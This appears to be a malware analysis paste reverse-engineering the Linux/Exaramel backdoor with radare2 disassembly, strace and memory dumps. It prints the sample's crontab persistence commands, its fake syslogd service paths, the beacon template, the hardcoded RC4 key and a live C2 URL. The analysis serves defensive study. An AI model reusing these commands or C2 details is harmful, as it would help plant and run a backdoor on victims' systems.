<li class="li1"><div class="de1">sendto<span class="br0">&#40;</span><span class="nu0">3</span><span class="sy0">,</span> <span class="st0">&quot;&lt;78&gt;Jan 10 07:55:51 crontab[2547]: (test) LIST (test)&quot;</span><span class="sy0">,</span> <span class="nu0">53</span><span class="sy0">,</span> MSG_NOSIGNAL<span class="sy0">,</span> NULL<span class="sy0">,</span> <span class="nu0">0</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">53</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="co1">---</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">#</span> MalwareMustDie! <span class="sy0">-</span> Don<span class="st0">'t spread malware - spread LOVE! @unixfreaxjp</span></div></li>
</ol>        </div>
    </div>

    
                
<!-- 0-x2xy94pJ -->
<div style="padding-bottom:10px; padding-top:10px;">
<div class="adsbyvli" style="width:970px; height:250px" data-ad-slot="vi_1282567605"></div> <script>(vitag.Init = window.vitag.Init || []).push(function () { viAPItag.display("vi_1282567605") })</script>
</div>

        <div class="content__title -no-border">
            RAW Paste Data        </div>

        <textarea class="textarea">// Linux/Exaramel (BlackEnergy) - APT ELF malware
// ref: https://www.virustotal.com/gui/file/c39b4105e1b9da1a9cccb1dace730b1c146496c591ce0927fb035d48e9cb5c0f/details
// binary forms (go-lang with &quot;vendor&quot; installation)
// quick analysis by @unixfreaxjp on radare2 &amp; tsurugi linux seccon
// *) on going stuff is happening, the contents can be changed. #MalwareMustDie! 

###############################
# Summary                     #
###############################

0. Checking, cloning, and initiating run space.
1. Use both lock (/tmp/.applock) file(unix socket) &amp; futex for protecting a running instance.
   i.e. new bins instance will be exusted due to lock file, dups clones controlled by futex
2. Aim persistence in cron &amp; systemd startup.
3. Read encrypted config file, if not exist drop hardcoded crypt one.
4. Grab information &amp; fills the template for C2 callbacks.
5. C2 establishment, sending information after read config and start listening.
6. Host resolving uses libnss; Networking supports system proxy.
7. Supported to remote command execution.
8. My opinion: Developer made work, not crooks.
9. Comments: https://twitter.com/malwaremustd1e/status/1216466744446840837

###############################
# Binary Analysis             #
###############################

1. Machine: Advanced Micro Devices X86-64
2. Symbol table &#039;.symtab&#039; contains 7726 entries.
3. go build ID
0x00400fd8  3133 3631 3236 3730 3763 6466 3136 6364  136126707cdf16cd
0x00400fe8  6133 3231 3562 6561 6435 3833 6331 6665  a3215bead583c1fe
0x00400ff8  3765 3237 3530 3636 48c7 4424 1000 0000  7e275066H.D$....
Notes at offset 0x00000fc8 with length 0x00000038:
  Owner         Data size       Description
  Go            0x00000028      Unknown note type: (0x00000004)
4. Program Headers:
  Type           Offset   VirtAddr           PhysAddr           FileSiz  MemSiz   Flg Align
  PHDR           0x000040 0x0000000000400040 0x0000000000400040 0x000188 0x000188 R   0x1000
  NOTE           0x000fc8 0x0000000000400fc8 0x0000000000400fc8 0x000038 0x000038 R   0x4
  LOAD           0x000000 0x0000000000400000 0x0000000000400000 0x248c80 0x248c80 R E 0x1000
  LOAD           0x249000 0x0000000000649000 0x0000000000649000 0x1ac10f 0x1ac10f R   0x1000
  LOAD           0x3f6000 0x00000000007f6000 0x00000000007f6000 0x02f7e0 0x052400 RW  0x1000
  GNU_STACK      0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW  0x8
  LOOS+5041580   0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000     0x8
5. Go syntax v1.8
/usr/lib/go-1.8/lib/time/zoneinfo.zip

###############################
# Static Reversing Analysis   #
###############################

[0x00455940]&gt; pdf
┌ 18: entry0 (int64_t arg_8h);
│           ; arg int64_t arg_8h @ rsp+0x8
│           0x00455940      488d742408     lea rsi, [arg_8h]
│           0x00455945      488b3c24       mov rdi, qword [rsp]
│           0x00455949      488d05100000.  lea rax, [main] ; sym.go.main
│           ; 0x455960 ; &quot;H\x8d\x05\x89\xc2\xff\xff\xff\xe0\xcc\xcc\xcc\xcc\xcc\xcc\u030b|$\b\xb8\xe7&quot;
└           0x00455950      ffe0           jmp rax
--- more ---
     :
[0x00455940]&gt; s sym.main.main
[0x00647540]&gt; pd 6
            ; CODE XREF from sym.main.main @ 0x648803
            ;-- sym.go.main.main:
┌ 4808: sym.main.main ();
│ bp: 0 (vars 0, args 0)
│ sp: 105 (vars 105, args 0)
│ rg: 0 (vars 0, args 0)
│           0x00647540      64488b0c25f8.  mov rcx, qword fs:[0xfffffffffffffff8]
│           0x00647549      488d842408fc.  lea rax, [rsp - 0x3f8]
│           0x00647551      483b4110       cmp rax, qword [rcx + 0x10]
│     ┌─&lt; 0x00647555      0f86a3120000   jbe 0x6487fe
│     │    0x0064755b      4881ec780400.  sub rsp, 0x478
│     │    0x00647562      4889ac247004.  mov qword [var_470h], rbp
--- more ---
     :
[0x00647540]&gt; pdsf
;-- sym.go.main.main:                                                  
0x00647572 call sym.main.getCurrentDir
0x006475b4 call sym.runtime.concatstring2
0x006475d0 call sym.time.Now
0x00647618 call sym.time.Time.String
0x0064768a call sym.net.Listen
0x006476d0 call sym.runtime.makechan
0x00647727 call fcn.00454c1d fcn.00454c1d
0x006477ba call sym.os_signal.Notify
0x006477f9 call sym.runtime.newproc
0x0064783c call sym.runtime.newobject
0x0064787c call sym.app_vendor_configur.LoadConfig
0x00647905 obj.main.defaulthost.str // &lt;====== C2 placeholder var
0x00647968 call sym.app_vendor_configur.UpdateConfig
0x00647981 call sym.runtime.makechan
0x006479a7 call sym.runtime.makechan
0x006479cd call sym.runtime.makechan
0x006479ea call sym.runtime.newobject
0x00647a38 call sym.runtime.newobject
0x00647a63 call fcn.00454c20 fcn.00454c20
0x00647af4 call fcn.00454f96 fcn.00454f96
0x00647b01 call sym.app_vendor_worker.__Worker_.CheckAdapt
0x00647bbd call sym.app_vendor_worker.__Worker_.GetUser
0x00647be8 call sym.app_vendor_worker.__Worker_.GetOS
0x00647c27 call sym.runtime.newproc
0x00647c51 call fcn.00454bfa fcn.00454bfa
0x00647c77 call sym.runtime.newselect
0x00647ca2 call sym.runtime.selectrecv
--- more ---

// seek persistency #1

chdir(&quot;/var/spool/cron&quot;), 1) = 0;
execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;, &quot;-c&quot;, &quot;(crontab -l 2&gt;/dev/null) | grep /test/Exaramel &amp;&amp; echo &#039;true&#039; || echo &#039;false&#039;&quot;]) = 0;
execve(&quot;/usr/bin/crontab&quot;, [&quot;crontab&quot;, &quot;-l&quot;]) = 0;
execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;, &quot;-c&quot;, &quot;(crontab -l 2&gt;/dev/null; echo &#039;*/1 * * * * /test/Exaramel&#039;) | crontab -&quot;]) = 0;
execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;, &quot;-c&quot;, &quot;(crontab -l 2&gt;/dev/null; echo &#039;@reboot /test/Exaramel&#039;) | crontab -&quot;]) = 0;

// persistency #2

stat(&quot;/etc/rc.d/syslogger&quot;,..) = 0;
stat(&quot;/etc/init/syslogd.conf&quot;,..) = 0;
stat(&quot;/etc/systemd/system/syslogd.service&quot;,..) = 0;
stat(&quot;/etc/init.d/syslogd&quot;,..) = 0;

// check user

execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;, &quot;-c&quot;, &quot;whoami&quot;]

// used for sending data to c2 with hardcoded template:

generation=%d&amp;guid=%s&amp;platform=%s&amp;version=%d&amp;whoami=%s%0A 

// lock runfile 

&quot;/tmp/.applock&quot;
code: getsockname(3, {sa_family=AF_FILE, path=&quot;/tmp/.applock&quot;}, [16])

// Code execution environment (is initiated)

0x32676 16 15 os/exec.Command
0x32686 23 22 os/exec.interfaceEqual
0x3269d 20 19 os/exec.(*Cmd).envv
0x326b1 21 20 os/exec.(*Cmd).stdin
0x326c6 22 21 os/exec.(*Cmd).stdout
0x326dc 22 21 os/exec.(*Cmd).stderr
0x326f2 32 31 os/exec.(*Cmd).writerDescriptor
0x32712 32 31 os/exec.(*Cmd).closeDescriptors
0x32732 21 20 os/exec.(*Cmd).Start
0x32747 27 26 os/exec.(*ExitError).Error
0x32762 20 19 os/exec.(*Cmd).Wait
0x32776 26 25 os/exec.(*Cmd).StdoutPipe
0x32790 26 25 os/exec.(*Cmd).StderrPipe
0x327aa 15 14 os/exec.init.1
0x327b9 23 22 os/exec.findExecutable
0x327d0 17 16 os/exec.LookPath
0x327e1 29 28 os/exec.interfaceEqual.func1
0x327fe 27 26 os/exec.(*Cmd).stdin.func1
0x32819 38 37 os/exec.(*Cmd).writerDescriptor.func1
0x3283f 27 26 os/exec.(*Cmd).Start.func1
0x3285a 27 26 os/exec.(*Cmd).Start.func2
0x32875 21 20 os/exec.init.1.func1
0x3288a 13 12 os/exec.init &lt;====
--- more ---
     :
void sym.os_exec.init(undefined8 param_1, undefined8 param_2, int64_t param_3)
{
    uint64_t *puVar1;
    int64_t extraout_RDX;
    int64_t in_FS_OFFSET;
    undefined8 uStack24;
    undefined8 uStack16;

    while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
          *(BADSPACEBASE **)0x20 &lt; (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
    {
        sym.runtime.morestack_noctxt(param_1, param_2, param_3);
        param_3 = extraout_RDX;
    }
    if (1 &lt; (uint8_t)obj.os_exec.initdone.) {
        return;
    }
    if (obj.os_exec.initdone. == (code)0x1) {
        sym.runtime.throwinit();
        do {
            invalidInstructionException();
        } while( true );
    }
    obj.os_exec.initdone. = (code)0x1;
    sym.bytes.init();
    sym.context.init();
    sym.io.init();
    sym.os.init();
    sym.path_filepath.init();
    sym.runtime.init();
    sym.strconv.init();
    sym.strings.init();
    sym.sync.init();
    sym.syscall.init();
    sym.errors.New();
    _obj.os_exec.ErrNotFound = uStack24;
    if (_obj.runtime.writeBarrier == 0) {
        *(undefined8 *)0x826548 = uStack16;
    } else {
        sym.runtime.writebarrierptr();
    }
    sym.os_exec.init.1();
    obj.os_exec.initdone. = (code)0x2;
    return;
}
      :
; CALL XREF from sym.app_vendor_worker.init @ 0x64623b
;-- sym.go.os_exec.init:
/ 234: sym.os_exec.init ();
| bp: 0 (vars 0, args 0)
| sp: 4 (vars 4, args 0)
| rg: 0 (vars 0, args 0)
|           0x00623e10      mov rcx, qword fs:[0xfffffffffffffff8]
|           0x00623e19      cmp rsp, qword [rcx + 0x10]
|       ,=&lt; 0x00623e1d      jbe 0x623ef0
|       |   0x00623e23      sub rsp, 0x28
; ---------------------------
|       :   0x0064623b      call sym.os_exec.init                      ;[1]
|       :   0x00646240      call sym.path_filepath.init                ;[2]
|       :   0x00646245      call sym.regexp.init                       ;[3]
|       :   0x0064624a      call sym.runtime.init                      ;[4]
|       :   0x0064624f      call sym.strconv.init                      ;[5]
|       :   0x00646254      call sym.strings.init                      ;[6]
|       :   0x00646259      call sym.syscall.init                      ;[7]
|       :   0x0064625e      call sym.time.init                         ;[8]
|       :   0x00646263      mov byte [obj.app_vendor_worker.initdone.], 2    ; [0x843345:1]=0
|       :   0x0064626a      mov rbp, qword [rsp]
|       :   0x0064626e      add rsp, 8
--- more ---
     :
; CALL XREF from sym.main.init @ 0x648a74
;-- sym.go.app_vendor_worker.init:
/ 173: sym.app_vendor_worker.init ();
| bp: 0 (vars 0, args 0)
| sp: 0 (vars 0, args 0)
| rg: 0 (vars 0, args 0)
|           0x006461d0      mov rcx, qword fs:[0xfffffffffffffff8]
|           0x006461d9      cmp rsp, qword [rcx + 0x10]
|       ,=&lt; 0x006461dd      jbe 0x646273
|       |   0x006461e3      sub rsp, 8
; ---------------------------
|       :   0x00648a74      call sym.app_vendor_worker.init            ;[1]
|       :   0x00648a79      call sym.app_vendor_github.com_satori_go_2euuid.init ;[2]
|       :   0x00648a7e      mov byte [obj.main.initdone.], 2           ; [0x843374:1]=0
|       :   0x00648a85      mov rbp, qword [rsp]
|       :   0x00648a89      add rsp, 8
|       :   0x00648a8d      ret
|       :   ; CODE XREF from sym.main.init @ 0x6489fd
|       :   0x00648a8e      call sym.runtime.morestack_noctxt          ;[3]
\       `=&lt; 0x00648a93      jmp sym.main.init
            0x00648a98      int3
            0x00648a99      int3
--- more ---
     :
[0x00648a23 [xAdvc]0 0% 180 Exaramel]&gt; pd $r @ sym.main.init+51 # 0x648a23
|       :   ; CODE XREF from sym.main.init @ 0x648a18
|      ,==&lt; 0x00648a23      7507           jne 0x648a2c
|      |:   0x00648a25      e896e8ddff     call sym.runtime.throwinit  ;[1]
|      |:   0x00648a2a      0f0b           ud2
|      |:   ; CODE XREF from sym.main.init @ 0x648a23
|      `--&gt; 0x00648a2c      c60541a91f00.  mov byte [obj.main.initdone.], 1    ; [0x843374:1]=0
|       :   0x00648a33      e8d837e9ff     call sym.app_vendor_configur.init ;[2]
|       :   0x00648a38      e82310e7ff     call sym.fmt.init           ;[3]
|       :   0x00648a3d      e89e48e9ff     call sym.math_rand.init     ;[4]
|       :   0x00648a42      e8896becff     call sym.net.init           ;[5]
|       :   0x00648a47      e804bcfcff     call sym.app_vendor_network.init ;[6]
|       :   0x00648a4c      e8efdde4ff     call sym.os.init            ;[7]
|       :   0x00648a51      e86ad3fcff     call sym.os_signal.init     ;[8]
|       :   0x00648a56      e8e51ce9ff     call sym.path_filepath.init ;[9]
|       :   0x00648a5b      e8b02cfdff     call sym.app_vendor_scheduler.init ;[?]
|       :   0x00648a60      e8cbd8e1ff     call sym.strconv.init       ;[?]
|       :   0x00648a65      e8b6afe7ff     call sym.strings.init       ;[?]
|       :   0x00648a6a      e80172e3ff     call sym.syscall.init       ;[?]
|       :   0x00648a6f      e83c6ee4ff     call sym.time.init          ;[?]
|       :   0x00648a74      e857d7ffff     call sym.app_vendor_worker.init ;[?]
|       :   0x00648a79      e8f2e6ffff     call sym.app_vendor_github.com_satori_go_2euuid.init ;[?]
|       :   0x00648a7e      c605efa81f00.  mov byte [obj.main.initdone.], 2    ; [0x843374:1]=0
|       :   0x00648a85      488b2c24       mov rbp, qword [rsp]
|       :   0x00648a89      4883c408       add rsp, 8
|       :   0x00648a8d      c3             ret
--- more ---
     :
    if (1 &lt; (uint8_t)obj.main.initdone.) {
        return;
    }
    if (obj.main.initdone. == (code)0x1) {
        sym.runtime.throwinit();
        do {
            invalidInstructionException();
        } while( true );
    }
    obj.main.initdone. = (code)0x1;
    sym.app_vendor_configur.init();
    sym.fmt.init();
    sym.math_rand.init();
    sym.net.init();
    sym.app_vendor_network.init();
    sym.os.init();
    sym.os_signal.init();
    sym.path_filepath.init();
    sym.app_vendor_scheduler.init();
    sym.strconv.init();
    sym.strings.init();
    sym.syscall.init();
    sym.time.init();
    sym.app_vendor_worker.init();
    sym.app_vendor_github.com_satori_go_2euuid.init();
    obj.main.initdone. = (code)0x2;
    return;
}

// proxy supported..

0x005f8bc0   42 1298         sym.net_http.ProxyFromEnvironment
0x005f90e0    6 141          sym.net_http.ProxyURL
0x005fad00    7 248          sym.net_http.__connectMethod_.proxyAuth
0x005ffa30   67 1631         sym.net_http.useProxy
0x00607600    1 28           sym.net_http.ProxyURL.func1
--- more ---
     :
0x9788ea 36 35 net/http.(*connectMethod).proxyAuth
0x97961f 18 17 net/http.useProxy
0x97b757 24 23 net/http.ProxyURL.func1
0x9dbc43 22 21 net/http.httpProxyEnv
0x9dbc6d 23 22 net/http.httpsProxyEnv
0x9dc038 20 19 net/http.noProxyEnv
0x768d   22 21 net/http.httpProxyEnv
0x76a3   23 22 net/http.httpsProxyEnv
0x78de   20 19 net/http.noProxyEnv
0x2e857  30 29 net/http.ProxyFromEnvironment
0x2e875  18 17 net/http.ProxyURL
--- more ---
     :
void sym.net_http.__connectMethod_.proxyAuth(undefined8 param_1, undefined8 param_2, int64_t param_3)
{
    uint64_t *puVar1;
    int64_t extraout_RDX;
    int64_t in_FS_OFFSET;
    int64_t *in_stack_00000008;
    undefined8 in_stack_00000010;
    undefined8 in_stack_00000018;

    while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
          *(BADSPACEBASE **)0x20 &lt; (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
    {
        sym.runtime.morestack_noctxt(param_1, param_2, param_3);
        param_3 = extraout_RDX;
    }
    if (*in_stack_00000008 != 0) {
        if (*(int64_t *)(*in_stack_00000008 + 0x20) != 0) {
            sym.net_http.basicAuth();
            sym.runtime.concatstring2();
            return;
        }
        return;
    }
    return;
}
--- more ---
     :
 ; CODE XREF from sym.net_http.__connectMethod_.proxyAuth @ 0x5fadf3
 ; CALL XREFS from sym.net_http.__Transport_.dialConn @ 0x5fe1b1, 0x5ff325
 ;-- sym.go.net_http.__connectMethod_.proxyAuth:
/ 248: sym.net_http.__connectMethod_.proxyAuth (int64_t arg_8h, int64_t arg_10h, int64_t arg_18h);
| bp: 0 (vars 0, args 0)
| sp: 10 (vars 7, args 3)
| rg: 0 (vars 0, args 0)
|           0x005fad00      mov rcx, qword fs:[0xfffffffffffffff8]
|           0x005fad09      cmp rsp, qword [rcx + 0x10]
|       ,=&lt; 0x005fad0d      jbe 0x5fadee
|       |   0x005fad13      sub rsp, 0x40
; ---------------------------
|           0x005fe1b1      call sym.net_http.__connectMethod_.proxyAuth ;[1] M=======
|           0x005fe1b6      mov rax, qword [var_4b0h]
|           0x005fe1bb      mov rcx, qword [var_4b8h]
|           0x005fe1c0      test rax, rax
|       ,=&lt; 0x005fe1c3      jne 0x5ff1c6
|       |   ; CODE XREF from sym.net_http.__Transport_.dialConn @ 0x5ff1fa
|       |   0x005fe1c9      lea rax, [0x0068f0a0]
|       |   0x005fe1d0      mov qword [rsp], rax
|       |   0x005fe1d4      mov rax, qword [var_300h]
|       |   0x005fe1dc      mov qword [var_4b8h], rax
|       |   0x005fe1e1      mov rcx, qword [var_2f8h]
--- more ---
     :
;-- sym.go.net_http.__Transport_.dialConn:
0x005fda2d call sym.runtime.newobject
0x005fda58 int64_t arg1
0x005fda5c int64_t arg2
0x005fda6e call fcn.00454fa4 fcn.00454fa4
0x005fda7b call sym.net_http.__connectMethod_.key
0x005fda80 int64_t arg2
0x005fda85 int64_t arg1
0x005fda97 call fcn.00454f96 fcn.00454f96
0x005fdab4 call sym.runtime.makechan
   :
0x005fdb69 call sym.runtime.newobject
0x005fdbad int64_t arg2
0x005fdbbf call fcn.00454f96 fcn.00454f96
0x005fdc8f call sym.net_http_httptrace.ContextClientTrace
0x005fdd41 call sym.net_http.__connectMethod_.addr ;&quot;tcp -&gt;  &lt;== ==&gt; @@@ MB) \r\t\n as  at  fp= in  is  lr: of  on  pc= sp: sp=!= 0%x\r\n&amp;gt;&amp;lt;&#039;\&#039;&quot;
0x005fdd7d call rcx
0x005fde21 call sym.crypto_tls.__Conn_.Handshake
0x005fde70 call sym.runtime.newproc
0x005fdeeb call fcn.00454f34 fcn.00454f34
0x005fdf17 call rbx
0x005fdf29 call sym.runtime.newobject
0x005fdf47 call sym.crypto_tls.__Conn_.ConnectionState
--- end ---

// drop config

openat(AT_FDCWD, &quot;{current dir}config.json&quot;, 1|2|0|0, 0666) = 0 ;

// write data from below and encrypting...(call: go crypto RC4 library)

0x006f9990  6874 7470 733a 2f2f 3137 362e 3331 2e32  https://176.31.2
0x006f99a0  3235 2e32 3034 2f61 7069 2f76 3100 0000  25.204/api/v1...

// encryption key :

in:
[0x006da25a [xAdvc]0 37% 16384 Exaramel]&gt; pd $r @ hit2_0
        ; DATA XREFS from sym.main.main @ 0x647823, 0x6486eb  
│        0x00647787      488d8c249800.  lea rcx, [var_98h]
│        0x0064778f      48898c24b002.  mov qword [var_2b0h], rcx
│        0x00647797      48890424       mov qword [rsp], rax
│        0x0064779b      488d8c247802.  lea rcx, [var_278h]
│        0x006477a3      48894c2408     mov qword [var_8h], rcx
│        0x006477a8      48c744241004.  mov qword [var_10h], 4
│        0x006477b1      48c744241804.  mov qword [var_18h], 4
│        0x006477ba      e8e1defcff     call sym.os_signal.Notify
│        0x006477bf      488b84242001.  mov rax, qword [var_120h]
│        0x006477c7      4889442410     mov qword [var_10h], rax 
│        0x006477cc      488b84244001.  mov rax, qword [var_140h]
│        0x006477d4      4889442418     mov qword [var_18h], rax 
│        0x006477d9      488b8c244801.  mov rcx, qword [var_148h]
│        0x006477e1      48894c2420     mov qword [var_20h], rcx 
│        0x006477e6      c70424180000.  mov dword [rsp], 0x18 
│        0x006477ed      488d1534160a.  lea rdx, [0x006e8e28] 
│        0x006477f4      4889542408     mov qword [var_8h], rdx 
│        0x006477f9      e8729cdeff     call sym.runtime.newproc
│        0x006477fe      488b05c3e71d.  mov rax, qword [0x00825fc8]
│        0x00647805      4885c0         test rax, rax 
│  ┌─&lt; 0x00647808      7527           jne 0x647831  
│  │    0x0064780a      48c705b3e71d.  mov qword [0x00825fc8], 0xa 
│  │    0x00647815      8b0515bf1f00   mov eax, dword [obj.runtime.writeBarrier]
│  │    0x0064781b      85c0           test eax, eax 
│┌──&lt; 0x0064781d      0f85bd0e0000   jne 0x6486e0  
│││    0x00647823      488d05302a09.  lea rax, [hit2_0] ; 0x6da25a ; &quot;s0m3t3rr0r&quot; &lt;======KEY!!
│││    0x0064782a      4889058fe71d.  mov qword [obj.main.key], rax 
--- more ---
     :
0x006da25a [xAdvc]0 37% 16384 Exaramel]&gt; ps 
0x006da25a &lt;nil&gt;runtime: s0m3t3rr0r(++junk)

// config

~/test$ r2 config.json 
 -- Invert the block bytes using the &#039;I&#039; key in visual mode
[0x00000000]&gt; px
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00000000  4f65 e400 ded5 2b33 3a61 37b5 1fd8 ffdf  Oe....+3:a7.....
0x00000010  9f57 b918 6d1e e9b8 8116 057f a636 08e2  .W..m........6..
0x00000020  4b5a 15c1 57a1 a0e9 1297 49e8 2942 8f78  KZ..W.....I.)B.x
0x00000030  e267 95ad aead 0846 5074 d17f 9eab e8c6  .g.....FPt......
0x00000040  7c29 d378 4fd7 5071 c311 53f5 de02 32d0  |).xO.Pq..S...2.
0x00000050  3e93 45e8 de72 a424 70fb 00e0 f30f 5be0  &gt;.E..r.$p.....[.
0x00000060  37eb 47a9 d57e ebee 583f 339c 5672 23c4  7.G..~..X?3.Vr#.
0x00000070  adbf d997 2f99 5a7f 063c 9ba5 7028 15b7  ..../.Z..&lt;..p(..
0x00000080  3ce6 da90 98ae 8c34 f8b2 0331 a445 d517  &lt;......4...1.E..
0x00000090  a946 173b c506 c450 0f9e 6a48 d068 b6c8  .F.;...P..jH.h..
0x000000a0  ffff ffff ffff ffff ffff ffff ffff ffff  ................

// the file is encrypted with RC4 with key above, decoded with any flavor:

{&quot;Hosts&quot;:[&quot;https://176.31.225.204/api/v1&quot;],&quot;Proxy&quot;:&quot;&quot;,&quot;Version&quot;:&quot;1&quot;,&quot;Guid&quot;:&quot;c65f5f15-2e64-4b41-9c95-59f0d94f5fca&quot;,&quot;Next&quot;:20,&quot;Datetime&quot;:&quot;&quot;,&quot;Timeout&quot;:30,&quot;Def&quot;:20}

// c2 

0x6f9990 30 29 https://176.31.225.204/api/v1

// you can seek callback OS on:

connect(6, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr(&quot;176.31.225.204&quot;)

// files enumeration (this happened before C2 networking started per clone)

getdents64($SOCKET, {{d_ino=$INODENUM, d_off=$OFFSETNUM,..
loop 
 {
   lstat(&quot;{$CURRPATH}/{files}&quot;..);
   openat(AT_FDCWD, &quot;{$CURRPATH}/{$DIRS}&quot;..
  }
getdents64($SOCKET, {}, $MMAP);
close($SOCKET);

###############################
# Dynamic Analysis            #
###############################

// works:

00400000-00649000 r-xp 00000000 08:01 397381             /test/Exaramel
00649000-007f6000 r--p 00249000 08:01 397381             /test/Exaramel
007f6000-00826000 rw-p 003f6000 08:01 397381             /test/Exaramel
00826000-00849000 rw-p 00000000 00:00 0
c000000000-c000001000 rw-p 00000000 00:00 0
c41fff8000-c420100000 rw-p 00000000 00:00 0
7f32836ed000-7f328378d000 rw-p 00000000 00:00 0
7fff6fc00000-7fff6fc21000 rw-p 00000000 00:00 0          [stack]
7fff6fdb9000-7fff6fdba000 r-xp 00000000 00:00 0          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]

Exaramel  cwd    DIR                8,1     4096  397369 /test
Exaramel  rtd    DIR                8,1     4096       2 /
Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
Exaramel    4u  0000                0,9        0    1203 anon_inode
Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom
Exaramel    6r  FIFO                0,8      0t0    6350 pipe
Exaramel    8r  FIFO                0,8      0t0    6351 pipe

Exaramel  cwd    DIR                8,1     4096  397369 /test
Exaramel  rtd    DIR                8,1     4096       2 /
Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
Exaramel    4u  0000                0,9        0    1203 anon_inode
Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom
Exaramel    6r  IPv4               6424      0t0     TCP $LOCAL:34573-&gt;176.31.225.204:443

Exaramel  cwd    DIR                8,1     4096  397369 /test
Exaramel  rtd    DIR                8,1     4096       2 /
Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
Exaramel    4u  0000                0,9        0    1203 anon_inode
Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom

// Live radare2 forensics (before)

0xc4200a6440 2304 /test/Exaramel]&gt; pxx @ obj.runtime.enoptrbss+528867392 # 0xc4200a6440
- offset -     0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
0xc4200a6440  Access-Control-Allow-Origin.....Content-Disposition.............
0xc4200a6480  If-Unmodified-Since.............Proxy-Authenticate..............
0xc4200a64c0  Proxy-Authorization.............Strict-Transport-Security.......
0xc4200a6500  Transfer-Encoding...............config.json.....................
0xc4200a6540  ..m...............m...............m.....................`.. ....
0xc4200a6580  listen unix /tmp/.applock.......bind: address already in use....
0xc4200a65c0  App has already started!.......................................
 
// Live radare2 forensics (after)
   :
0xc42000ed90  Authorization...Content-EncodingContent-LocationContent-Range...Expect..If-MatchLinkMax-
0xc42000ede8  ForwardsRangeReferer....RefreshTrailer..Retry-After.....Vary100101102200Www-Authenticate
0xc42000ee40  201202203204205.206207208226300.301302303304305.307308400401402.403404405406407.40840941
0xc42000ee98  0411412.413414415416417.418422423424426.428429431451500.501502503504505.506507508510511.
0xc42000eef0  $.m.............j6n.....&amp;.........m..............!n..............bn.....4.........m.....
0xc42000ef48  ......../test/`........ E. ..../tmp/.applock............................................
0xc42000efa0  rH..*.E?.[......&amp;.............../dev/urandom............@.. ............................
0xc42000eff8  ................................Hosts...................Proxy...................Version.
0xc42000f050  ................Guid....................Next....................Datetime................
0xc42000f0a8  Timeout.................Def.............................................................
   :
0xc42000f408  /bin/sh................./bin/sh.-c......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.
0xc42000f460  USER=nyan_apt....SHLVL=1.........HOME=/test.LOGNAME=test......._=./Exaramel...1.m.......
0xc42000f4b8  ........`.......... ....`.......... ..../dev/null.......... ....... ....................
0xc42000f510  /bin/sh./bin/sh.-c.whoami.......SHELL=/bin/bash.TERM=vt100......HUSHLOGIN=FALSE.USER=nyan
0xc42000f568  _apt.....SHLVL=1.mung....HOME=/test..LOGNAME=test...._=./Exaramel........test../bin/uname
0xc42000f5c0  `.m............./usr/bin/uname../usr/bin/uname../bin/uname......`.......... ....`.......
0xc42000f618  ... ..../dev/null.......... ....... ............uname.................../bin/uname......
0xc42000f670  -a.TERM=vt100...SHELL=/bin/bash.HUSHLOGIN=FALSE.USER=test....SHLVL=1.nyan_apt%0A.HOME=/te
0xc42000f6c8  st.LOGNAME=test...._=./Exaramel..........`.....@.. ....... ....$.......... .............
0xc42000f720  P.. ....I.........m...............m...........nyan_apt%0A...............................
  :
0xc42004a36f  .*/1 * * * * /test/Exaramel.@reboot /test/Exaramel.true.................................
0xc42004a4cf  ..`. ............................................Linux xxxxxxxxxxxxxxxxxxxxxxxxxx #1 SMP
0xc42004a527   xxxxxxxxxxxxxxxxxxxxxx GNU/Linux.......................................................
0xc42004c660  (crontab -l 2&gt;/dev/null) | grep //test/Exaramel &amp;&amp; echo &#039;true&#039; || echo &#039;false&#039;.........
  :
0xc420053148  ........................................................................................
0xc4200531a0  /etc/systemd/system/syslogd.service.....................................................
0xc4200531f8  ........................................................................................
  :
0xc4200533d3  ........................................................................................
0xc42005342b  .....................https://176.31.225.204/api/v1/auth/app.............................
0xc420053483   .............................q`........ ...............................................
  :
0xc4200551e0  generation=1&amp;guid=7248d60f-2a8f-453f-ac5b-19f5e0d7a3b0&amp;platform=Linux+xxxxxxxxxxxxxxxxx
